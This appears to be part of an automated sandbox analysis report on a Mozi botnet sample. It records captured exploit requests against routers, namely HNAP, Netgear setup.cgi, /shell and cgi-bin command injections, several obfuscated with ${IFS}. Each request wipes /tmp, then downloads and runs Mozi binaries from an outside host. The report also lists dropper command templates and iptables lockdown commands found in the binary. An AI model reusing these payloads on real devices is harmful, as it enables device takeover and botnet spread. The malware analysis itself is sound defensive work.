4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 166.88.13.234:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: /tmp/nT7K5GG5km (PID: 4623)Socket: 0.0.0.0::44040
                Source: unknownTCP traffic detected without corresponding DNS query: 173.128.113.111
                Source: unknownTCP traffic detected without corresponding DNS query: 151.70.88.212
                Source: unknownTCP traffic detected without corresponding DNS query: 37.127.116.2
                Source: unknownTCP traffic detected without corresponding DNS query: 73.213.225.252
                Source: unknownTCP traffic detected without corresponding DNS query: 164.95.80.124
                Source: unknownTCP traffic detected without corresponding DNS query: 3.220.46.172
                Source: unknownTCP traffic detected without corresponding DNS query: 65.119.165.128
                Source: unknownTCP traffic detected without corresponding DNS query: 159.30.196.217
                Source: unknownTCP traffic detected without corresponding DNS query: 112.60.138.223
                Source: unknownTCP traffic detected without corresponding DNS query: 54.72.49.99
                Source: unknownTCP traffic detected without corresponding DNS query: 159.134.45.88
                Source: unknownTCP traffic detected without corresponding DNS query: 169.108.151.225
                Source: unknownTCP traffic detected without corresponding DNS query: 46.69.243.160
                Source: unknownTCP traffic detected without corresponding DNS query: 159.184.117.36
                Source: unknownTCP traffic detected without corresponding DNS query: 45.71.81.134
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.196.152
                Source: unknownTCP traffic detected without corresponding DNS query: 187.65.235.163
                Source: unknownTCP traffic detected without corresponding DNS query: 133.182.208.68
                Source: unknownTCP traffic detected without corresponding DNS query: 105.202.173.103
                Source: unknownTCP traffic detected without corresponding DNS query: 192.37.11.14
                Source: unknownTCP traffic detected without corresponding DNS query: 128.34.103.41
                Source: unknownTCP traffic detected without corresponding DNS query: 65.169.70.71
                Source: unknownTCP traffic detected without corresponding DNS query: 185.146.156.163
                Source: unknownTCP traffic detected without corresponding DNS query: 96.200.64.71
                Source: unknownTCP traffic detected without corresponding DNS query: 122.157.60.54
                Source: unknownTCP traffic detected without corresponding DNS query: 99.231.44.225
                Source: unknownTCP traffic detected without corresponding DNS query: 88.83.215.123
                Source: unknownTCP traffic detected without corresponding DNS query: 112.188.233.56
                Source: unknownTCP traffic detected without corresponding DNS query: 106.180.217.144
                Source: unknownTCP traffic detected without corresponding DNS query: 177.228.76.105
                Source: unknownTCP traffic detected without corresponding DNS query: 196.250.243.57
                Source: unknownTCP traffic detected without corresponding DNS query: 80.6.216.131
                Source: unknownTCP traffic detected without corresponding DNS query: 151.160.250.99
                Source: unknownTCP traffic detected without corresponding DNS query: 141.215.180.231
                Source: unknownTCP traffic detected without corresponding DNS query: 18.21.159.227
                Source: unknownTCP traffic detected without corresponding DNS query: 53.12.181.226
                Source: unknownTCP traffic detected without corresponding DNS query: 72.240.24.193
                Source: unknownTCP traffic detected without corresponding DNS query: 168.237.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 60.222.236.176
                Source: unknownTCP traffic detected without corresponding DNS query: 45.220.233.11
                Source: unknownTCP traffic detected without corresponding DNS query: 54.48.115.122
                Source: unknownTCP traffic detected without corresponding DNS query: 65.123.42.165
                Source: unknownTCP traffic detected without corresponding DNS query: 188.61.141.250
                Source: unknownTCP traffic detected without corresponding DNS query: 189.51.61.124
                Source: unknownTCP traffic detected without corresponding DNS query: 99.79.97.187
                Source: unknownTCP traffic detected without corresponding DNS query: 82.32.209.151
                Source: unknownTCP traffic detected without corresponding DNS query: 111.39.224.122
                Source: unknownTCP traffic detected without corresponding DNS query: 54.139.218.167
                Source: unknownTCP traffic detected without corresponding DNS query: 218.150.197.195
                Source: unknownTCP traffic detected without corresponding DNS query: 111.99.121.168
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 112.125.239.197:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 147.46.176.166:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 3.22.17.236:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 1.34.1.251:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 46.249.83.253:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 13.109.201.46:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 89.129.183.215:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 188.106.17.156:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: unknownDNS traffic detected: queries for: dht.transmissionbt.com
                Source: unknownHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 81.196.113.75:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 01 May 2021 18:05:29 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 287Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 65 74 75 70 2e 63 67 69 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 73 69 6e 75 73 76 2e 66 76 64 73 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /setup.cgi was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at sinusv.fvds.ru Port 80</address></body></html>
                Source: nT7K5GG5kmString found in binary or memory: http://%s:%d/Mozi.a;chmod
                Source: nT7K5GG5kmString found in binary or memory: http://%s:%d/Mozi.a;sh$
                Source: nT7K5GG5kmString found in binary or memory: http://%s:%d/Mozi.m
                Source: nT7K5GG5kmString found in binary or memory: http://%s:%d/Mozi.m;
                Source: nT7K5GG5kmString found in binary or memory: http://%s:%d/Mozi.m;$
                Source: nT7K5GG5kmString found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
                Source: nT7K5GG5kmString found in binary or memory: http://%s:%d/bin.sh
                Source: nT7K5GG5kmString found in binary or memory: http://%s:%d/bin.sh;chmod
                Source: nT7K5GG5kmString found in binary or memory: http://127.0.0.1
                Source: nT7K5GG5kmString found in binary or memory: http://127.0.0.1sendcmd
                Source: nT7K5GG5kmString found in binary or memory: http://HTTP/1.1
                Source: nT7K5GG5kmString found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
                Source: .config.8.drString found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
                Source: nT7K5GG5kmString found in binary or memory: http://ipinfo.io/ip
                Source: alsa-info.sh0.8.drString found in binary or memory: http://pastebin.ca)
                Source: alsa-info.sh0.8.drString found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
                Source: alsa-info.sh0.8.drString found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
                Source: nT7K5GG5kmString found in binary or memory: http://purenetworks.com/HNAP1/
                Source: nT7K5GG5kmString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: nT7K5GG5kmString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                Source: nT7K5GG5kmString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
                Source: alsa-info.sh0.8.drString found in binary or memory: http://www.alsa-project.org
                Source: alsa-info.sh0.8.drString found in binary or memory: http://www.alsa-project.org.
                Source: alsa-info.sh0.8.drString found in binary or memory: http://www.alsa-project.org/alsa-info.sh
                Source: alsa-info.sh0.8.drString found in binary or memory: http://www.alsa-project.org/cardinfo-db/
                Source: alsa-info.sh0.8.drString found in binary or memory: http://www.pastebin.ca
                Source: alsa-info.sh0.8.drString found in binary or memory: http://www.pastebin.ca.
                Source: alsa-info.sh0.8.drString found in binary or memory: http://www.pastebin.ca/upload.php
                Source: /tmp/nT7K5GG5km (PID: 4600)HTML file containing JavaScript created: /usr/networksJump to dropped file
                Source: Initial sampleString containing 'busybox' found: busybox
                Source: Initial sampleString containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
                Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1
                Source: Initial sampleString containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
                Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/ls|more
                Source: Initial sampleString containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
                Source: Initial sampleString containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
                Source: Initial sampleString containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
                Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
                Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
                Source: Initial sampleString containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
                Source: Initial sampleString containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
                Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
                Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
                Source: Initial sampleString containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
                Source: Initial sampleString containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
                Source: Initial sampleString containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
